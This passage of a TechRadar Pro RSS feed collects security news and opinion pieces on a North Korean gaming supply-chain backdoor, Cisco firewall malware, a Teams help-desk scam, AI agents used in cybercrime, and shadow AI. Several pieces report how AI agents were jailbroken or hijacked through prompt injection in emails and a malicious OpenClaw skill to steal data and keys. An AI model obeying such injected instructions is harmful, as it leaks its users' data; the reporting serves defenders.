                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/eVgzzXmQMEyvzfYvAaAMrX-1280-80.jpg">
                                                            <media:credit><![CDATA[wk1003mike / Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Trojan]]></media:description>                                                            <media:text><![CDATA[Trojan]]></media:text>
                                <media:title type="plain"><![CDATA[Trojan]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/eVgzzXmQMEyvzfYvAaAMrX-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>North Korean APT37 (ScarCruft) gang compromised a Yanbian gaming platform to deliver the BirdCall backdoor</strong></li><li><strong>On Windows, it enabled data theft and command execution; on Android, it exfiltrated contacts, messages, media, and ambient audio</strong></li><li><strong>The malware is actively maintained, with Android versions still hosted, targeting ethnic Koreans and defectors in China</strong></li></ul><p>North Korean state-sponsored threat actors are apparently targeting their compatriots living in (or moving through) China with advanced Android backdoors across gaming platforms. </p><p>A <a href="https://www.welivesecurity.com/en/eset-research/rigged-game-scarcruft-compromises-gaming-platform-supply-chain-attack/" target="_blank" rel="nofollow">report</a> from security researchers ESET claims to have seen an advanced supply-chain attack that probably began in late 2024. The threat actors, most likely ScarCruft (also known as APT37, or Reaper), managed to compromise SQgame, a multi-platform gaming service built specifically for the people of Yanbian.</p><p>The Yanbian Korean Autonomous Prefecture is an autonomous prefecture in China’s Jilin Province. It is located near the border with North Korea and Russia, and was established to give administrative autonomy to the large population of ethnic Koreans living there. According to ESET, Yanbian is also a key crossing point for North Korean refugees and defectors, which could be one of the reasons why it’s being targeted.</p><h2 id="birdcall-malware">BirdCall malware</h2><p>"In the attack, probably ongoing since late 2024, ScarCruft compromised Windows and Android components of a video game platform dedicated to Yanbian-themed games, trojanizing them with a backdoor," ESET said. </p><p>The backdoor is called BirdCall and, depending on the platform it is installed on, can do different things. 
On Windows, it can grab screenshots, log keystrokes, steal the contents of the clipboard, execute shell commands, and exfiltrate data. All of the stolen info is then uploaded to legitimate cloud services such as Dropbox or pCloud. </p><p>On Android, things are a bit different, allowing ScarCruft to also exfiltrate contact lists, SMS messages, call logs, media files, documents, screenshots, and even ambient audio. So far, the <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> has been updated seven times, leading researchers to believe it is being actively maintained. </p><p>ESET says that the platform is still hosting malicious games, although these seem to be limited to the Android platform. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ AI agents now commit and conceal cybercrimes on their own ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/ai-agents-now-commit-and-conceal-cybercrimes-on-their-own</link>
                                                                            <description>
                            <![CDATA[ Autonomous AI fraud agents steal massive data, hiding their tracks beyond human attribution ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">iZ9nkMPc9pEXb6XuHD4zb</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/pVCXKrhThqmUjYVSZBjV5Z-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 06 May 2026 13:44:13 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Terence Kwok ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/pVCXKrhThqmUjYVSZBjV5Z-1280-80.jpg">
                                                            <media:credit><![CDATA[Thapana Onphalai via Getty Images]]></media:credit>
                                                                                                                                                                        <media:description><![CDATA[Autonomous AI fraud agents steal massive data, hiding their tracks beyond human attribution.]]></media:description>                                                            <media:text><![CDATA[Hands on a laptop with overlaid logos representing network security]]></media:text>
                                <media:title type="plain"><![CDATA[Hands on a laptop with overlaid logos representing network security]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/pVCXKrhThqmUjYVSZBjV5Z-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>For several years now, AI has been showing up in fraud as an accelerant. It drafted phishing emails, polished social engineering scripts and helped attackers move faster. The human operator still sat close to every meaningful step.</p><p>But that distance is shrinking fast. In September 2025, Anthropic’s Claude Code was used in a cyber-espionage campaign in which AI handled 80 to 90% of tactical operations across roughly 30 targets. </p><p>A few months later, reporting on the Mexican government breach described a jailbroken Claude Code setup that Gambit Security said stole more than 150GB of data and exposed roughly 195 million identities.</p><p>That’s the real break with the past. We are no longer looking at AI as a helper inside a criminal workflow; we are confronting systems that can carry out large parts of the workflow by themselves.</p><h2 id="cybercrime-has-changed-its-shape">Cybercrime has changed its shape</h2><p>Once an agent has tools, context, and permission, cybercrime starts to look like an always-on operation. It can recon targets, write exploits, harvest credentials, move laterally, and package stolen data at machine speed. </p><p>This matters because those capabilities are now part of the real threat environment. Attacks by AI-enabled adversaries rose 89% year over year, and autonomous AI adoption is climbing despite <a href="https://www.techradar.com/news/best-internet-security-suites">security</a> concerns. </p><p>We’re witnessing the setting for the next fraud wave: agents enter mainstream systems at the same moment attackers learn how to weaponize them.</p><p>Fraud loves scale, repetition, and weak supervision. Agentic systems bring all three. They do not get tired and do not forget the playbook. They can be pointed at thousands of tiny decisions that add up to huge losses.</p><h2 id="attribution-is-starting-to-fail">Attribution is starting to fail</h2><p>Traditional attribution leans on familiar clues. 
Investigators compare IP paths, <a href="https://www.techradar.com/best/best-malware-removal">malware</a> families, domains, infrastructure, and other indicators of compromise — even though the field has long known that proxies, false flags, and shared tooling can blur that picture.</p><p>Agentic AI makes the problem worse because the operational exhaust is no longer tied neatly to a single human hand. The model can generate fresh code, adapt the sequence of actions, or distribute work across tools and sessions. In the Mexico case, the spotlight fell on an unidentified attacker aided by <a href="https://www.techradar.com/best/best-ai-tools">AI tools</a>, and this kind of ambiguity should worry every defender.</p><p>So the point is not that humans disappear, but that responsibility gets smeared across prompts, models, tools, delegated permissions, and machine-generated actions. That weakens the old comfort that attribution will eventually catch up. The forensic trail now contains a non-human operator making consequential moves inside the attack chain.</p><h2 id="identity-has-to-travel-with-the-agent">Identity has to travel with the agent</h2><p>Every meaningful AI action should carry a verifiable cryptographic identity. Once an AI agent is able to act inside a system, those actions should not be anonymous. Each one should be signed, linked to a verifiable identity, and captured in a trustworthy audit trail. Without that, we are asking security teams to govern autonomous behavior that leaves no reliable proof of authorship.</p><p>The idea isn't fringe; it's already here. NIST launched an AI Agent Standards Initiative in February. 
Its concept paper explicitly calls for identifying agents, linking user identities to delegated actions, logging agent activity, and tracking the provenance of prompts and data inputs.</p><p>The market is already telling us why this matters: 68% of organizations cannot clearly distinguish AI agent activity from human activity, even as 73% expect agents to become vital within a year. That is not a minor governance gap; it is a direct liability in any environment where fraud, abuse, or data theft can be carried out through an agent.</p><h2 id="the-hard-part-is-not-cryptography-but-governance">The hard part is not cryptography, but governance</h2><p>We already know how to sign and verify digital artifacts. Provenance, integrity, and identity-bound signatures can be made usable at scale. The missing move is extending that discipline from models and software artifacts to the actions agents take after deployment.</p><p>That won’t be simple. Standards have to work across model labs, enterprise stacks, <a href="https://www.techradar.com/best/best-open-source-software">open-source</a> tooling, API gateways and agent protocols. <a href="https://www.techradar.com/best/best-privacy-apps-for-android">Privacy</a> questions are real, too, because auditability cannot become a back door for blanket surveillance.</p><p>Still, those are design problems, not excuses for anonymity. I believe what’s missing is an identity verification layer that lets people, institutions, and eventually AI agents prove who they are, what they’re allowed to do, and which credentials can be trusted, without exposing the raw data underneath. Built well, that kind of system gives trust a cryptographic form. It can move across platforms, survive handoffs between systems, and hold up under scrutiny.</p><p>Fraud spreads wherever <a href="https://www.techradar.com/best/best-identity-management-software">identity management</a> is flimsy and provenance breaks down. 
If access, eligibility, and high-risk actions are tied to verifiable credentials, it becomes much harder for a <a href="https://www.techradar.com/pro/best-ai-chatbot-for-business">bot</a>, a synthetic identity, or an autonomous agent to pass through systems on empty claims. The action carries its history with it. The trust signal does too.</p><p>AI fraud has crossed a threshold. When an agent can scout, decide, execute, and document the operation, anonymity becomes a structural weakness instead of a convenience.</p><p>We need a security model that does more than log what happened after the fact. We need one that can prove who stood behind an action, who delegated it, and whether that identity can be trusted in the first place. In a world of autonomous agents, that is no longer a nice-to-have safeguard but the baseline for keeping fraud governable.</p><p><a href="https://www.techradar.com/best/best-identity-theft-protection"><em>We've ranked the best Identity Theft Protection</em></a><em>.</em></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ How AI's evolution is redefining risks ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/how-ais-evolution-is-redefining-risks</link>
                                                                            <description>
                            <![CDATA[ Industrialized cybercrime means AI has moved from a double-edged to a triple-edged sword. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">dhC2aUgfNgBPPhievWX223</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/ywSwn3oGxXv4PfcRPZmTrc-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 06 May 2026 10:27:07 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Richard Lindsay ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/ywSwn3oGxXv4PfcRPZmTrc-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock/TippaPatt]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[ Man coding programmer, software developer working on digital tablet with binary, html computer code on virtual screen]]></media:description>                                                            <media:text><![CDATA[ Man coding programmer, software developer working on digital tablet with binary, html computer code on virtual screen]]></media:text>
                                <media:title type="plain"><![CDATA[ Man coding programmer, software developer working on digital tablet with binary, html computer code on virtual screen]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/ywSwn3oGxXv4PfcRPZmTrc-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p><a href="https://www.techradar.com/best/best-ai-tools">AI tools</a> have long been a double-edged sword, used by attackers and defenders alike. </p><p>However, it has recently shown its third edge; as it becomes increasingly embedded within organizations as a tool, it is now also an attack surface which cybercriminals will look to exploit, and which organizations must strive to protect.</p><p>At first glance, it may appear that this has tipped the AI scales in favor of attackers. AI has industrialized the cybercrime landscape, boosting the efficiency of attacks, as well as enabling them to be scaled up. </p><p>And now, it is no longer just a weapon but a new attack vector.  However, this same efficiency can be used to help power defenses against cyberattacks, helping to protect organizations.</p><h2 id="a-new-frontier-of-ai-enhanced-attacks">A new frontier of AI-enhanced attacks</h2><p>While AI offers immense potential for innovation, it has also been adopted as a powerful tool by cybercriminals to execute more sophisticated attacks. Threat actors like Storm-0817, for instance, actively use AI to assist in <a href="https://www.techradar.com/best/best-malware-removal">malware</a> development and social media scraping. </p><p>Groups like the Black Basta collective have also used AI to craft emails in multiple languages, thereby expanding their global reach. OpenAI recently disrupted dozens of malicious operations that were misusing its models for malware creation, phishing, and disinformation. </p><p>While most cybercriminal groups still seem to be using AI as more of an assistive tool at this stage, a future of fully automated cyber attacks is growing increasingly possible. </p><p>In November of last year, Anthropic disrupted the first reported AI-orchestrated cyber espionage campaign, during which its agentic AI tool Claude Code was manipulated to conduct automated reconnaissance and intrusion attempts against global targets. 
</p><p>It is highly likely that we will see more attacks like this in the coming months, as attackers gain skill and confidence in using AI. </p><h2 id="two-edges-becomes-three">Two edges becomes three</h2><p>The third edge represents a shift in AI, away from being just a weapon or a shield and instead becoming a handle which attackers can use to steer an organization's own <a href="https://www.techradar.com/best/best-infrastructure-management-service">IT infrastructure</a> against itself, whether through attackers exploiting plugins used to connect AI tools to enterprise data, or via ‘hijacking’ an AI assistant. As agentic AI becomes increasingly the norm, we will see this more and more. </p><p>This can be seen in the 2025 compromise of the “Drift” AI module linked to Salesloft, which resulted in the theft of Salesforce data from several hundred organizations, including multiple security vendors. </p><p>Another example is the recent “EchoLeak” campaign against Microsoft 365 Copilot, which revealed how a carefully crafted email could deliver malicious instructions to an embedded AI assistant, leading to silent data exfiltration. </p><p>Finally, this third edge to AI has also been sharpened by the growing problem of Shadow AI, where employees use unauthorized AI tools, creating a ‘leaky bucket’ where sensitive corporate <a href="https://www.techradar.com/best/best-product-information-management-software">information</a> is sometimes fed into public models. </p><h2 id="ai-s-neutrality-defense-vs-offense">AI’s neutrality: defense vs offense</h2><p>Crucially, organizations must not shy away from AI simply because it is an attack vector. AI as a technology offers significant efficiency benefits to organizations across sectors, and so the answer isn’t to avoid it but to protect AI tools and systems properly. 
</p><p>The best way to balance AI risk with optimized business potential is to take a <a href="https://www.techradar.com/news/best-internet-security-suites">security</a>-first and human-centric approach. That means putting people in control while using AI to support decision-making. This ‘Secure AI’ approach encompasses a system that is transparent, explainable, and aligned with regulations to meet unique needs and IT company ambitions.</p><p>The silver lining is AI’s own neutrality; the very same algorithms that power sophisticated cyber attacks can also be used to support modern defense systems. For instance, AI can streamline threat detection, incident response, and risk management. </p><p>Where traditional detection methods fall short in <a href="https://www.techradar.com/best/best-online-cyber-security-courses">cybersecurity</a>, defensive AI can assist in identifying ‘beaconing’ behavior through pattern recognition. Anomalies are raised to security teams through real-time notifications, enabling prompt investigation alongside required action. </p><p>Overall, this supports teams with more routine elements of system security, including the <a href="https://www.techradar.com/pro/best-it-documentation-tool">documentation</a> of security intelligence, event information, and analysing potentially harmful emails alongside malicious files. </p><p>Machine learning can also be used in autonomous threat detection and response programs.</p><h2 id="the-myth-of-the-golden-ticket">The myth of the golden ticket</h2><p>The intention of the user largely dictates the risk-reward ratio. AI, like any tool, is prone to misuse and can be poisoned or hijacked, which means it isn’t a ‘golden ticket’ in cybersecurity. </p><p>Defenders who protect systems must not only understand and be trained on the testing of AI systems and their security, but also be in decision-making positions to execute what AI cannot adequately do. 
</p><p>In an era of industrialized cybercrime, success won’t be found in the AI buzz but in how well we blunt the third edge before it is turned against us.</p><p><em></em><a href="https://www.techradar.com/best/best-antivirus"><em>We've reviewed the best Antivirus Software</em></a><em>.</em></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ New 'Firestarter' malware flames on in spite of Cisco firewall updates and security patches ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/new-firestarter-malware-flames-on-in-spite-of-cisco-firewall-updates-and-security-patches</link>
                                                                            <description>
                            <![CDATA[ Security pros are warning about custom malware targeting Cisco firewalls, and surviving upgrades and reboots. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">GFVU9UKJ6kvfarh3Nps8a7</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/kCbP2VkzMgQpYqJDgMQ8UZ-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 27 Apr 2026 15:25:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/kCbP2VkzMgQpYqJDgMQ8UZ-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Cybersecurity]]></media:description>                                                            <media:text><![CDATA[Cybersecurity]]></media:text>
                                <media:title type="plain"><![CDATA[Cybersecurity]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/kCbP2VkzMgQpYqJDgMQ8UZ-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>Cisco Talos warns of Firestarter, a new malware targeting unpatched Firepower and Secure Firewall devices</strong></li><li><strong>UAT‑4356 group exploited flaws CVE‑2025‑20333 and CVE‑2025‑20362 to deploy Line Viper before dropping Firestarter</strong></li><li><strong>CISA confirmed exploitation against at least one federal agency</strong></li></ul><p>Security researchers have warned of Firestarter, a brand new custom-built malware which targets unpatched Cisco Firepower and Secure Firewall devices, persisting over reboots, security patches, and even firmware updates.</p><p>Experts from Cisco Talos flagged that Firestarter only works on devices running Adaptive Security Appliance (ASA) or Firepower Threat Defense (FTD) software. It was built by a threat actor tracked as UAT-4356, a group Cisco has been warning about for at least two years now.</p><p>In mid-2024, <a href="https://www.techradar.com/pro/security/cisco-reveals-zero-day-attacks-used-by-hackers-to-attack-government-networks-in-major-threat-campaign" target="_blank">Cisco said</a> that sophisticated threat actors with possible ties to eastern nation-states were abusing two flaws in Cisco VPNs and <a href="https://www.techradar.com/best/firewall" target="_blank">firewalls</a> to drop malware. The same group, which is also being tracked as STORM-1849, abused two flaws at the time: CVE-2024-20353 and CVE-2024-20359.</p><h2 id="confirming-the-breach">Confirming the breach</h2><p>This time around, they are abusing a missing authorization issue tracked as CVE-2025-20333, and a buffer overflow bug tracked as CVE-2025-20362, to first deploy Line Viper (a user-mode shellcode loader), before dropping Firestarter.</p><p>Line Viper was said to be able to run CLI commands, capture packets, bypass VPN Authentication, Authorization, and Accounting (AAA) for actor devices, suppress syslog messages, steal user CLI commands, and force a delayed device restart. 
</p><p>For at least one Federal Civilian Executive Branch (FCEB) agency, the devices were compromised in the window of time between the patch being released, and being deployed on the devices: </p><p>“CISA has not confirmed the exact date of initial exploitation but assesses the compromise occurred in early September 2025, and before the agency implemented patches in accordance with ED 25-03,” <a href="https://www.cisa.gov/news-events/analysis-reports/ar26-113a" target="_blank">CISA said </a>in its security advisory. </p><p>By tweaking the startup mount list, the malware makes sure it persists even after reboots.</p><p>Those running Firepower and Secure Firewall, and looking for mitigations and workarounds, should read Cisco’s security advisory <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-persist-CISAED25-03?vs_f=Cisco%20Security%20Advisory%26vs_cat=Security%20Intelligence%26vs_type=RSS%26vs_p=Continued%20Evolution%20of%20Persistence%20Mechanism%20Against%20Cisco%20Secure%20Firewall%20Adaptive%20Security%20Appliance%20and%20Secure%20Firewall%20Threat%20Defense%26vs_k=1" target="_blank">here</a>. The company said it “strongly recommends” reimaging and upgrading the device using the fixed releases.</p><p><em>Via </em><a href="https://thehackernews.com/2026/04/firestarter-backdoor-hit-federal-cisco.html" target="_blank"><em>The Hacker News</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ 'An interesting evolution in tactics': Google security experts flag new cyber scam which abuses Microsoft Teams to steal your data ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/an-interesting-evolution-in-tactics-google-security-experts-flag-new-cyber-scam-which-abuses-microsoft-teams-to-steal-your-data</link>
                                                                            <description>
                            <![CDATA[ Hackers first create a problem then try to "solve it" by pretending to be IT helpdesk. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">hr4qhEocfrtDqjQ2MLZ8Pf</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/UNBhCvCBZ47GpjzV7AN5mG-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 27 Apr 2026 10:39:10 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/UNBhCvCBZ47GpjzV7AN5mG-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                        <media:description><![CDATA[(Image credit: Shutterstock)]]></media:description>                                                            <media:text><![CDATA[Security]]></media:text>
                                <media:title type="plain"><![CDATA[Security]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/UNBhCvCBZ47GpjzV7AN5mG-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>Google identifies new threat group, UNC6692, using spam floods and fake IT support messages via Microsoft Teams to trick victims</strong></li><li><strong>Targets were lured to a landing page that harvested credentials and deployed a three‑part malware framework themed around snow</strong></li><li><strong>The toolkit includes a persistence‑focused browser extension, a tunneling tool for data exfiltration, and a backdoor enabling full endpoint takeover</strong></li></ul><p>Google has sounded the alarm on a previously undocumented threat actor group that uses cheeky social engineering tactics to deploy a trilogy of malware.</p><p>In an in-depth <a href="https://cloud.google.com/blog/topics/threat-intelligence/unc6692-social-engineering-custom-malware" target="_blank">report</a> Google said it saw UNC6692 - seemingly a new collective - bombard target email inboxes with countless spam messages in a short timeframe. </p><p>Soon after, they would reach out to the owner of that inbox via Microsoft Teams, through the cross-tenant feature, and introduce themselves as IT/helpdesk officials. They would say they were tasked with fixing the spam issue and would share a link to a landing page where the alleged fix can be found.</p><h2 id="the-snow-framework">The 'snow' framework</h2><p>Victims who follow the link are first asked to do a “health check” by clicking a button on the page which prompts the user to authenticate using their email and password which are then siphoned to the attackers’ servers. 
</p><p>Google also noticed the login attempt never works on the first try - which is a deliberate attempt to increase perceived legitimacy and make sure victims don’t share a fake or typo’d password.</p><p>After “logging in”, the page then performs an “email integrity check”, which is just a cover for what goes on in the background - the deployment of a <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> framework consisting of three elements. </p><p>"By the time the user receives a 'Configuration completed successfully' message, the attacker has secured the credentials and potentially established a persistent foothold on the endpoint using these staged files," Google said in the report.</p><p>The framework is themed around snow, and contains three tools: SnowBelt, SnowGlaze, and SnowBasin. </p><p>The first is a Chromium-based extension that establishes persistence via the browser’s extension registration system. The extensions are often named “MS Heartbeat” or “System Heatbeat”. </p><p>The second is a tunneler that creates an authenticated WebSocket tunnel, enabling easy communication and possible data extraction. The third one is a backdoor that allows full endpoint takeover.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Shadow AI and agents like OpenClaw are hijacking corporate data too easily ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/shadow-ai-and-agents-like-openclaw-are-hijacking-corporate-data-too-easily</link>
                                                                            <description>
                            <![CDATA[ Discover how Shadow AI agents are quietly bypassing traditional defenses. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">b3PmYEyEXY7Aj9rgn2EP2o</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/sqGgDPxHyGtqunPo56h9cL-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 27 Apr 2026 10:10:49 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Si West ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/sqGgDPxHyGtqunPo56h9cL-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A pink triangle with a red exclamation mark inside on a blue digital landscape]]></media:description>                                                            <media:text><![CDATA[A pink triangle with a red exclamation mark inside on a blue digital landscape]]></media:text>
                                <media:title type="plain"><![CDATA[A pink triangle with a red exclamation mark inside on a blue digital landscape]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/sqGgDPxHyGtqunPo56h9cL-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>According to UpGuard’s late-2025 report, nearly 90 percent of <a href="https://www.techradar.com/news/best-internet-security-suites">security</a> professionals use unapproved <a href="https://www.techradar.com/best/best-ai-tools">AI tools</a> at work. The people responsible for enforcing security policy are, by their own admission, ignoring it. More than 80 percent of workers across all roles use unsanctioned AI, and executives are the most prolific offenders.</p><p>We’ve been here before. A decade ago, the fight was over shadow IT — personal Dropbox accounts, unapproved SaaS apps, data flowing through tools that never passed a security review. Most organizations eventually got that under control with CASBs, discovery tooling, and better-sanctioned alternatives.</p><p>But those playbooks assumed the tools were dumb pipes: they moved and stored data, and the fix was visibility into where it went. Shadow AI doesn’t work that way, because AI tools don’t just store your data — they process it, and in some cases retain it.</p><p>When someone pastes a customer list into a free-tier chatbot or feeds proprietary code into an <a href="https://www.techradar.com/computing/artificial-intelligence/best-llms">LLM</a> to debug it faster, that data enters a system the organization has no control over. There’s no audit trail, and often nobody knows it happened. </p><p>On the compliance side, that creates exposure that compounds the longer it goes unaddressed: no data processing agreement, no documented retention policy, and no ability to respond to a GDPR subject access request or demonstrate to auditors that sensitive data stayed within regulatory boundaries.</p><p>The costs of Shadow AI are measurable. 
Recent Netwrix research indicates that organizations with high levels of unsanctioned AI usage experience data breach costs that are, on average, $670,000 higher than those with lower usage.</p><p>And banning AI doesn’t fix it — Software AG found that 46 percent of <a href="https://www.techradar.com/pro/best-employee-management-software-of-year">employees</a> would keep using unapproved tools even after an explicit ban. Prohibition just pushes the behavior underground.</p><p>There’s another cost that doesn’t show up in breach reports. When employees rely on unapproved models for analysis, drafting, or code generation, nobody is validating what comes back. Hallucinated data points end up in executive briefings.</p><p>Flawed code ships to production because the model that wrote it was never vetted against the organization's standards. Legal teams draft language using tools that nobody in compliance has reviewed.</p><p>The accuracy of the organization's own outputs erodes over time — and because the tools are unapproved, the teams using them have built workflows the business can’t see, can’t audit, and can’t replace if the tool changes its terms or gets cut off tomorrow.</p><h2 id="from-chatbots-to-autonomous-agents">From chatbots to autonomous agents</h2><p>Everything above describes employees using AI as a tool — typing a prompt, getting a response, pasting it somewhere. The next wave is different. Agentic AI systems don’t wait for prompts. They take actions: reading <a href="https://www.techradar.com/best/best-secure-email-providers">email</a>, executing code, accessing files, chaining tasks together, all running with the user’s own permissions.</p><p>OpenClaw, the open-source AI agent that racked up 145,000 GitHub stars in weeks, shows where this is heading. As a productivity tool, it’s impressive. 
As an attack surface, it’s what Cisco called a security nightmare.</p><p>When Cisco’s AI security research team tested the top-ranked community extension on OpenClaw’s skill repository, they found it was functionally <a href="https://www.techradar.com/best/best-malware-removal">malware</a>: it silently sent data to an attacker-controlled server via embedded shell commands while using prompt injection to bypass the agent’s safety guidelines.</p><p>That skill had been downloaded thousands of times. It was one of at least 230 malicious extensions uploaded to the repository within weeks of OpenClaw going viral. Kaspersky found 512 vulnerabilities in a single audit, eight of them critical. China banned it from government systems.</p><p>OpenClaw is one platform, but the pattern — broad system access, community-sourced plugins, weak default security — is the direction the whole category is moving. Gartner predicts 40 percent of enterprise applications will feature task-specific AI agents by the end of this year, up from under five percent in 2025.</p><p>These agents break the assumptions most security tooling is built on. An agent sending an email looks identical to the legitimate user. EDR sees normal traffic.</p><p>There’s no malicious binary to flag. And because agents process external content — emails, web pages, <a href="https://www.techradar.com/best/best-document-management-software">documents</a>, images — adversaries can embed instructions in that content and hijack the agent’s behavior without any human clicking anything. </p><p>Researchers have already demonstrated a single poisoned email causing an agent to hand over private keys from the host machine.</p><h2 id="what-actually-works">What actually works</h2><p>Blanket bans fail. That much is obvious from the <a href="https://www.techradar.com/best/best-data-recovery-service">data</a>. What works is giving people something better to use. 
One healthcare system that replaced its AI ban with approved tools saw unauthorized use fall 89 percent.</p><p>People reach for shadow AI because it solves real problems faster than whatever IT has sanctioned. Close that gap and most of the risky behavior goes away on its own.</p><p>Beyond that, treat AI interactions like data transfers. Apply DLP policies to prompts. Classify what should never enter an external model.</p><p>Build visibility into what tools employees are actually using — BlackFog’s research suggests 99 percent of organizations currently have no way of measuring shadow AI activity in their environments.</p><p>For agentic AI, the bar has to be higher. Autonomous tools need sandboxing, least-privilege access, and proper vetting of every extension before deployment.</p><p>Security teams need monitoring built for AI-native threats — prompt injection, supply chain compromise through malicious skills, credential leakage through agent memory — because legacy endpoint tools weren’t built to catch any of this.</p><p>None of this works as a policing exercise, though. Governance has to feel like a service to employees, not a constraint imposed on them. The organizations that figure this out will be in a strong position. The ones still pretending it’s not their problem are already behind — their data has been leaving the building, one prompt at a time, for months.</p><p><em></em><a href="https://www.techradar.com/best/best-online-cyber-security-courses"><em>We've featured the best online cybersecurity course.</em></a></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. 
